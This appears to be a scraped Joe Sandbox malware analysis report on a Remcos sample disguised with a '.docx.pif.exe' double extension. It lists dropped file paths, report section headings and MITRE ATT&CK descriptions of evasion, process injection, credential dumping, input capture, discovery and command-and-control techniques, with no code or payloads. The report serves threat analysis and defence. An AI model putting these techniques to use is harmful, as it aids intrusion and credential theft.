Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\gaban\logs.dat

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TkdxROLUOVpK.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0mssylnt.hbg.ps1

Windows Analysis Report
#U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre